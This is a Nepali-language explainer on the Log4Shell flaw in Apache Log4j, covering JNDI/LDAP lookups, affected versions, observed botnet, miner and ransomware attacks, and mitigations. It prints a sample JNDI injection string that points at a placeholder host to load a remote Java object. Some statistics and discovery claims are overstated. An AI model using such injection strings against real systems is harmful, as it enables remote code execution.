विषयसूची[लुकाउनुहोस्][देखाउनु]
नोभेम्बर २०२१ को अन्तमा, हामीले साइबर सुरक्षाको लागि ठूलो खतरा पत्ता लगायौं। यो शोषणले विश्वभरि लाखौं कम्प्युटर प्रणालीहरूलाई सम्भावित रूपमा असर गर्नेछ।
यो Log4j कमजोरी र कसरी एक बेवास्ता गरिएको डिजाइन त्रुटिले विश्वको 90% भन्दा बढी कम्प्युटर सेवाहरू आक्रमण गर्न खुला रह्यो भन्ने बारे गाइड हो।
Apache Log4j Apache Software Foundation द्वारा विकसित गरिएको खुला स्रोत Java-आधारित लगिङ उपयोगिता हो। मूल रूपमा 2001 मा Ceki Gülcü द्वारा लेखिएको, यो अब Apache Logging Services को हिस्सा हो, Apache Software Foundation को एक परियोजना।
संसारभरका कम्पनीहरूले आफ्नो अनुप्रयोगहरूमा लगिङ सक्षम गर्न Log4j पुस्तकालय प्रयोग गर्छन्। वास्तवमा, जाभा पुस्तकालय यति सर्वव्यापी छ, तपाईले यसलाई Amazon, Microsoft, Google, र थपका अनुप्रयोगहरूमा फेला पार्न सक्नुहुन्छ।
पुस्तकालयको प्रमुखता भनेको कोडमा कुनै पनि सम्भावित त्रुटिले लाखौं कम्प्युटरहरूलाई ह्याकिङको लागि खुला छोड्न सक्छ। नोभेम्बर 24, 2021 मा, ए क्लाउड सुरक्षा अलिबाबाका लागि काम गर्ने अनुसन्धानकर्ताले एउटा भयानक त्रुटि पत्ता लगाएका छन् ।
Log4j कमजोरी, जसलाई Log4Shell पनि भनिन्छ, 2013 देखि अनपेक्षित रूपमा अवस्थित थियो। कमजोरीले खराब अभिनेताहरूलाई Log4j चलिरहेको प्रभावित प्रणालीहरूमा कोड चलाउन अनुमति दियो। यो डिसेम्बर 9th, 2021 मा सार्वजनिक रूपमा खुलासा गरिएको थियो
उद्योग विशेषज्ञहरूले Log4Shell त्रुटिलाई भन्छन् हालको मेमोरीमा सबैभन्दा ठूलो जोखिम.
जोखिमको प्रकाशन पछिको हप्तामा, साइबर सुरक्षा टोलीहरूले लाखौं आक्रमणहरू पत्ता लगाए। केही अन्वेषकहरूले प्रति मिनेट एक सय भन्दा बढी आक्रमणको दर पनि अवलोकन गरे।
यस्ले कसरी काम गर्छ?
किन Log4Shell यति खतरनाक छ बुझ्नको लागि, हामीले यो के सक्षम छ भनेर बुझ्न आवश्यक छ।
Log4Shell भेद्यताले स्वेच्छाचारी कोड कार्यान्वयनको लागि अनुमति दिन्छ, जसको मूल अर्थ हो कि आक्रमणकारीले लक्षित मेसिनमा कुनै पनि आदेश वा कोड चलाउन सक्छ।
यसले यो कसरी पूरा गर्छ?
पहिले, हामीले JNDI के हो भनेर बुझ्नुपर्छ।
जाभा नेमिङ र डाइरेक्टरी इन्टरफेस (JNDI) एक जाभा सेवा हो जसले जाभा प्रोग्रामहरूलाई नाम मार्फत डाटा र स्रोतहरू पत्ता लगाउन र हेर्न अनुमति दिन्छ। यी डाइरेक्टरी सेवाहरू महत्त्वपूर्ण छन् किनभने तिनीहरूले विकासकर्ताहरूलाई अनुप्रयोगहरू सिर्जना गर्दा सजिलै सन्दर्भ गर्नका लागि रेकर्डहरूको संगठित सेट प्रदान गर्दछ।
JNDI ले निश्चित डाइरेक्टरी पहुँच गर्न विभिन्न प्रोटोकलहरू प्रयोग गर्न सक्छ। यी मध्ये एक प्रोटोकल लाइटवेट डाइरेक्टरी एक्सेस प्रोटोकल, वा LDAP हो।
स्ट्रिङ लग गर्दा, log4j स्ट्रिङ प्रतिस्थापनहरू प्रदर्शन गर्दछ जब तिनीहरूले फारमको अभिव्यक्तिहरू सामना गर्छन् ${prefix:name}
.
जस्तै, Text: ${java:version}
पाठको रूपमा लगइन हुन सक्छ: Java संस्करण 1.8.0_65। यी प्रकारका प्रतिस्थापनहरू सामान्य छन्।
हामी पनि जस्तै अभिव्यक्ति हुन सक्छ Text: ${jndi:ldap://example.com/file}
जसले LDAP प्रोटोकल मार्फत URL बाट Java वस्तु लोड गर्न JNDI प्रणाली प्रयोग गर्दछ।
यसले त्यो URL बाट मेसिनमा आउने डाटालाई प्रभावकारी रूपमा लोड गर्छ। कुनै पनि सम्भावित ह्याकरले सार्वजनिक URL मा मालिसियस कोड होस्ट गर्न सक्छ र Log4j प्रयोग गरेर मेशिनहरू लग इन गर्न पर्खन सक्छ।
लग सन्देशहरूको सामग्रीहरूमा प्रयोगकर्ता-नियन्त्रित डाटा समावेश भएको हुनाले, ह्याकरहरूले आफ्नै JNDI सन्दर्भहरू घुसाउन सक्छन् जुन उनीहरूले नियन्त्रण गर्ने LDAP सर्भरहरूमा देखाउँछन्। यी LDAP सर्भरहरू दुर्भावनापूर्ण Java वस्तुहरूले भरिपूर्ण हुन सक्छन् जसलाई JNDI ले कमजोरी मार्फत कार्यान्वयन गर्न सक्छ।
के यो नराम्रो बनाउँछ कि यो अनुप्रयोग सर्भर-साइड वा ग्राहक-साइड अनुप्रयोग हो भने फरक पर्दैन।
जबसम्म त्यहाँ लगरको लागि आक्रमणकर्ताको दुर्भावनापूर्ण कोड पढ्नको लागि एक तरिका छ, अनुप्रयोग अझै पनि शोषणको लागि खुला छ।
को प्रभावित छ?
भेद्यताले APache Log4j प्रयोग गर्ने सबै प्रणाली र सेवाहरूलाई असर गर्छ, संस्करण 2.0 सम्म र 2.14.1 सहित।
धेरै सुरक्षा विशेषज्ञहरूले सल्लाह दिन्छन् कि जोखिमले Java प्रयोग गर्ने धेरै अनुप्रयोगहरूलाई असर गर्न सक्छ।
माइक्रोसफ्टको स्वामित्वमा रहेको Minecraft भिडियो गेममा यो त्रुटि पहिलो पटक पत्ता लागेको थियो। माइक्रोसफ्टले आफ्ना प्रयोगकर्ताहरूलाई कुनै पनि जोखिमबाट बच्न आफ्नो जाभा संस्करण Minecraft सफ्टवेयर अपग्रेड गर्न आग्रह गरेको छ।
जेन इस्टरली, साइबर सुरक्षा र पूर्वाधार सुरक्षा एजेन्सी (CISA) का निर्देशक भन्छन् कि विक्रेताहरूले एक प्रमुख जिम्मेवारी यस जोखिमको शोषण गर्ने दुर्भावनापूर्ण अभिनेताहरूबाट अन्त प्रयोगकर्ताहरूलाई रोक्न।
"विक्रेताहरूले आफ्ना ग्राहकहरूसँग पनि कुराकानी गर्नुपर्दछ कि अन्त-प्रयोगकर्ताहरूलाई थाहा छ कि उनीहरूको उत्पादनले यो जोखिम समावेश गर्दछ र सफ्टवेयर अपडेटहरूलाई प्राथमिकता दिनुपर्छ।"
आक्रमणहरू पहिले नै सुरु भइसकेको बताइएको छ। साइबरसेक्युरिटी सफ्टवेयर उपलब्ध गराउने कम्पनी सिमान्टेकले विभिन्न किसिमका आक्रमण अनुरोधहरू अवलोकन गरेको छ।
यहाँ अनुसन्धानकर्ताहरूले पत्ता लगाएका आक्रमणका प्रकारका केही उदाहरणहरू छन्:
- botnets
बोटनेटहरू कम्प्युटरहरूको नेटवर्क हो जुन एकल आक्रमणकारी पक्षको नियन्त्रणमा हुन्छ। तिनीहरूले DDoS आक्रमणहरू गर्न, डाटा चोरी गर्न र अन्य घोटालाहरू गर्न मद्दत गर्छन्। अन्वेषकहरूले Log4j शोषणबाट डाउनलोड गरिएका शेल स्क्रिप्टहरूमा Muhstik botnet अवलोकन गरे।
- XMRig माइनर ट्रोजन
XMRig एक खुला स्रोत क्रिप्टोकरेन्सी माइनर हो जसले मोनेरो टोकन खानी गर्न CPUs प्रयोग गर्दछ। साइबर अपराधीहरूले मानिसहरूको यन्त्रहरूमा XMRig स्थापना गर्न सक्छन् ताकि तिनीहरूले तिनीहरूको जानकारी बिना तिनीहरूको प्रशोधन शक्ति प्रयोग गर्न सकून्।
- खोन्सारी रान्समवेयर
Ransomware ले डिजाइन गरिएको मालवेयरको रूपलाई बुझाउँछ ईन्क्रिप्ट फाइलहरू कम्प्युटरमा। आक्रमणकारीहरूले त्यसपछि इन्क्रिप्टेड फाइलहरूमा पहुँच फिर्ता दिने बदलामा भुक्तानीको माग गर्न सक्छन्। अनुसन्धानकर्ताहरूले Log4Shell आक्रमणहरूमा खोन्सारी ransomware पत्ता लगाए। तिनीहरू विन्डोज सर्भरहरूलाई लक्षित गर्छन् र .NET फ्रेमवर्कको प्रयोग गर्छन्।
अर्को के हुन्छ?
Log4J कमजोरीले ल्याएको अराजकतालाई पूर्ण रूपमा समाधान गर्न महिनौं वा वर्ष पनि लाग्न सक्ने विज्ञहरूले अनुमान गरेका छन्।
यो प्रक्रियाले प्रत्येक प्रभावित प्रणालीलाई प्याच गरिएको संस्करणको साथ अद्यावधिक गर्ने समावेश गर्दछ। यदि यी सबै प्रणालीहरू प्याच गरिएका छन् भने, त्यहाँ अझै पनि सम्भावित ब्याकडोरहरूको खतरा छ जुन ह्याकरहरूले पहिले नै विन्डोमा थपेका हुन सक्छन् जुन सर्भरहरू आक्रमणको लागि खुला थिए।
धेरै समाधान र न्यूनीकरणहरू यो बग द्वारा शोषण हुनबाट अनुप्रयोगहरूलाई रोक्नको लागि अवस्थित छ। नयाँ Log4j संस्करण 2.15.0-rc1 ले यस जोखिमलाई कम गर्न विभिन्न सेटिङहरू परिवर्तन गर्यो।
JNDI प्रयोग गर्ने सबै सुविधाहरू पूर्वनिर्धारित रूपमा असक्षम हुनेछन् र रिमोट लुकअपहरू पनि प्रतिबन्धित छन्। तपाईंको Log4j सेटअपमा लुकअप सुविधा असक्षम पार्नुले सम्भावित शोषणको जोखिम कम गर्न मद्दत गर्नेछ।
Log4j बाहिर, खुला-स्रोत शोषण रोक्न अझै फराकिलो योजनाको आवश्यकता छ।
यसअघि मे महिनामा ह्वाइट हाउसले एक विज्ञप्ति जारी गरेको थियो कार्यकारी आदेश जसको उद्देश्य राष्ट्रिय साइबर सुरक्षा सुधार गर्ने हो। यसमा सामग्रीको सफ्टवेयर बिल (SBOM) को प्रावधान समावेश थियो जुन अनिवार्य रूपमा औपचारिक कागजात थियो जसमा अनुप्रयोग निर्माण गर्न आवश्यक पर्ने प्रत्येक वस्तुको सूची समावेश थियो।
यसमा भागहरू समावेश छन् जस्तै खुला स्रोत विकासका लागि प्रयोग गरिएका प्याकेजहरू, निर्भरताहरू र API हरू। SBOM को विचार पारदर्शिताका लागि उपयोगी भए पनि यसले उपभोक्तालाई साँच्चै मद्दत गर्छ?
स्तरवृद्धि निर्भरता धेरै झन्झट हुन सक्छ। कम्पनीहरूले वैकल्पिक प्याकेजहरू खोज्न अतिरिक्त समय बर्बाद गर्ने जोखिमको सट्टा कुनै पनि जरिवाना तिर्न छनौट गर्न सक्छन्। सायद यी SBOM हरू मात्र उपयोगी हुनेछ यदि तिनीहरूको गुंजाइश थप सीमित छ।
निष्कर्ष
Log4j मुद्दा संस्थाहरूको लागि प्राविधिक समस्या मात्र होइन।
व्यवसायी नेताहरूले सम्भावित जोखिमहरू बारे सचेत हुनैपर्छ जुन तिनीहरूको सर्भर, उत्पादनहरू, वा सेवाहरू कोडमा भर पर्दा तिनीहरू आफैंले कायम गर्दैनन्।
खुला स्रोत र तेस्रो पक्षीय अनुप्रयोगहरूमा भर पर्दा सधैं केही मात्रामा जोखिम हुन्छ। कम्पनीहरूले नयाँ खतराहरू प्रकाशमा आउनु अघि जोखिम न्यूनीकरण रणनीतिहरू काम गर्ने विचार गर्नुपर्छ।
धेरै जसो वेब विश्वभरका हजारौं स्वयंसेवकहरूद्वारा राखिएको खुला स्रोत सफ्टवेयरमा निर्भर हुन्छ।
यदि हामी वेबलाई सुरक्षित स्थानमा राख्न चाहन्छौं भने, सरकार र निगमहरूले खुला स्रोत प्रयासहरू र साइबर सुरक्षा एजेन्सीहरू जस्तै कोषमा लगानी गर्नुपर्छ। CISA.
जवाफ छाड्नुस्